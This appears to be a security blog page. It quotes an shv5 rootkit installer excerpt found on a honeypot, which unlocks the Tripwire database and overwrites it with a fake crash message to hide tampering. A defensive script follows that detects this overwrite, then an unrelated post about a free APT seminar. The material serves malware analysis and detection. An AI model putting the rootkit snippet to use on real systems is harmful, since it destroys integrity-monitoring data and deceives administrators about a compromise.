echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}"
uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd
if [ -d /etc/tripwire ]; then
    echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}"
    if [ -f /var/lib/tripwire/$uname.twd ]; then
        chattr -isa $twd
        echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}"
        echo "${RED} ALERT! tripwire database found ${RES}"
        echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}"
        echo "-----------------------------------------" > $twd
        echo "Tripwire segment-faulted !" >> $twd
        echo "-----------------------------------------" >> $twd
        echo "" >> $twd
        echo "The reasons for this may be: " >> $twd
        echo "" >> $twd
        echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd
        echo "corrupted files while checking for possible change etc." >> $twd
        echo ""
        echo "pls. rerun tripwire to build the database again!" >> $twd
        echo "" >> $twd
    else
        echo "${WHI} lucky you: Tripwire database not found. ${RES}"
    fi
else
    echo "${WHI} guess not. ${RES}"
fi
Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats
Reviewing some of the malware setup scripts I've collected through my honeypot, the following code really caught my attention. This code is from the shv5 rootkit, which was released in 2010, and is detected by most antivirus scanners.
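As an added example (not code from the original post or from the rootkit), the check below flags a Tripwire database that has been overwritten with the fake crash text written by the script on this page. It assumes a genuine `.twd` database is binary data; the function name `check_twd` and its exit codes are this example's own choices.

```shell
#!/bin/sh
# Added example: detect a Tripwire database replaced by the fake
# "segment-faulted" text that the installer script on this page writes.
# Assumption: a genuine .twd database is binary data, never plain text.

# check_twd FILE
#   returns 0 = no indicator found, 1 = looks overwritten, 2 = file missing
check_twd() {
    f=$1
    if [ ! -f "$f" ]; then
        echo "MISSING: $f (deleted, or Tripwire never initialised)"
        return 2
    fi

    # Indicator 1: banner lines copied from the script's echo statements.
    if grep -qF -e 'Tripwire segment-faulted !' \
                -e 'pls. rerun tripwire to build the database again!' "$f"
    then
        echo "TAMPERED: $f contains the fake crash banner"
        return 1
    fi

    # Indicator 2: the file holds no non-printable bytes at all, i.e. it is
    # plain text (or empty) where a binary database is expected.
    nonprint=$(LC_ALL=C tr -d '[:print:][:space:]' < "$f" | wc -c | tr -d ' ')
    if [ "$nonprint" -eq 0 ]; then
        echo "TAMPERED: $f is plain text, not a binary database"
        return 1
    fi

    echo "OK: $f shows neither indicator"
    return 0
}

# Usage: sh check_twd.sh /var/lib/tripwire/$(uname -n).twd
# (the path the script on this page targets)
if [ "$#" -gt 0 ]; then
    check_twd "$1"
fi
```

Run it from trusted media or against a mounted disk image, since tools on a host with a rootkit installed cannot be trusted.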
Hacker's Breakfast - Absolutely Great Learning Experience
Today I had the privilege of attending a free training seminar put on by TrainACE called "The Hacker's Breakfast". The topic of the day was advanced persistent threats and one of my favorite topics - honeypots.
Not only did I get a free breakfast, but I learned a lot from Alex Lanstein of FireEye and Timber Wolfe of Neustar, Inc.
If you haven't attended one of these yet - I would strongly encourage you to do so. TrainACE provides the training completely free of charge - and you'll get to learn about some of the other training opportunities which are coming up.
This wasn't your typical "free advertisement disguised as a seminar". In fact the training provided was extremely informative and useful - and there wasn't any pressure to buy anything or sign up for any future training classes.
I'd like to give a big shout out to Megan Horner for inviting me to the event. Megan recently submitted a guest blog post which you can view here.
